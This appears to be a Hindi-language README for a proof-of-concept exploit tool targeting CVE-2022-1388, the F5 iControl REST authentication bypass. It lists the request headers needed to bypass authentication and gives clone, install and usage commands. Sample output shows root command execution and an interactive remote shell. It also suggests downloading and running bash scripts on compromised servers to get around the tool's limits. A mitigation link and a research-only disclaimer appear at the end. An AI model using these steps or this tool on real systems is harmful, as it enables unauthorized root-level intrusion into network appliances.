
CVE-2022-1388 के लिए बेहतर POC जो कई F5 उत्पादों को प्रभावित करता है।
CVE-2022-1388 के लिए बेहतर POC जो कई F5 उत्पादों को प्रभावित करता है।
यह Horizon3 के CVE-2022-1388 के प्रूफ ऑफ कॉन्सेप्ट का बेहतर संस्करण है: https://github.com/horizon3ai/CVE-2022-1388
साथ ही यह PsychoSec कार्य के लिए रीफैक्टरिंग के साथ पूर्ण पुनर्कार्य है: https://github.com/PsychoSec2/CVE-2022-1388-POC
LOL इस व्यक्ति ने Requirements अनुभाग में brains जैसी बात का उल्लेख किया है और इसमें +40% डुप्लिकेट और बिल्कुल स्केलेबल नहीं कोड है।
सत्र ब्लॉक को भी हटा दिया गया क्योंकि मुझे यहाँ इसका कोई खास अर्थ नहीं दिखता।
इस संस्करण में कई सुधारों के साथ-साथ रिमोट कमांड चलाने के लिए एक इंटरैक्टिव शेल भी शामिल है।
इस कमजोरी का Horizon3 का तकनीकी मूल कारण विश्लेषण उनके ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
इस कमजोरी का शोषण करने के अनुरोध के लिए आवश्यक शर्तें:
Connection header must include X-F5-Auth-Token
X-F5-Auth-Token header must be present
Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host
Auth header must be set with the admin username and any password
git
pip3
python3
git clone https://github.com/iveresk/cve-2022-1388-iveresk-command-shell.git
cd cve-2022-1388-iveresk-command-shell
pip3 install -r requirements.txt
python3 cve-2022-1388-1veresk.py -h
लक्ष्य का परीक्षण:
python3 cve-2022-1388-1veresk.py.py -u -t https://192.168.0.221
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!
इंटरैक्टिव शेल चलाने के लिए -s विकल्प का उपयोग करें। इंटरैक्टिव शेल:
python3 cve-2022-1388-1veresk.py -u -s https://192.168.0.221
Running interactive shell..
root@f5-localhost: /var/service/restjavad$
Dose not require the use of any reverse tcp connection or listeners.
Use 'exit' command to exit the shell...
कृपया ध्यान दें कि बिना पैच वाले सिस्टम पर इंटरैक्टिव शेल चलाते समय, कुछ कमांड और सिंटैक्स काम नहीं कर सकते हैं या अपेक्षित परिणाम नहीं दे सकते हैं। यह संभवतः सर्वर API अनुरोधों और प्रतिक्रियाओं में JSON के उपयोग के कारण है। किसी भी समस्या से बचने के लिए इंटरैक्टिव शेल का उपयोग करते समय JSON सिंटैक्स में सामान्य वर्णों जैसे डबल कोट्स, कोलन, कॉमा, कर्ली ब्रेसेस और ब्रैकेट का उपयोग न करने का प्रयास करें। कोई भी JSON सिंटैक्स संरचित प्रारूप में होना चाहिए।
कमांड के भीतर किसी भी प्रकार के असंरचित JSON सिंटैक्स का उपयोग सर्वर को एक विकृत API अनुरोध का कारण बन सकता है और आपको इससे निपटना पड़ सकता है: कोई कमांड आउटपुट नहीं, कुछ भी निष्पादित नहीं होना, या यह आपको पूरी तरह से पायथन स्क्रिप्ट से बाहर फेंक सकता है। यह दुर्भाग्य से कुछ कमांड को अनुपयोगी बना देता है। इस समस्या से निपटने के लिए आप इसके बजाय एक bash स्क्रिप्ट लिख सकते हैं, इसे सर्वर पर डाउनलोड कर सकते हैं, और इंटरैक्टिव शेल का उपयोग करके इसे निष्पादित कर सकते हैं। 'cd' कमांड का उपयोग करके निर्देशिकाओं को बदलना भी संभव नहीं है।
किसी भी स्थिति में आपको अभी भी बुनियादी कमांड आउटपुट प्राप्त करने में सक्षम होना चाहिए। यदि आपको कोई कमांड आउटपुट नहीं मिलता है, तो इसका मतलब यह नहीं है कि कमांड निष्पादित नहीं हुआ। हालाँकि, आपको अपने स्वयं के विश्लेषण का उपयोग करके यह पता लगाना होगा।
नवीनतम संस्करण में अपडेट करें या F5 सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें
https://support.f5.com/csp/article/K23605346
यह सॉफ्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत किए जाने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।
आप किसी भी विवरण के लिए Keybase के माध्यम से मुझसे संपर्क करने के लिए स्वतंत्र हैं।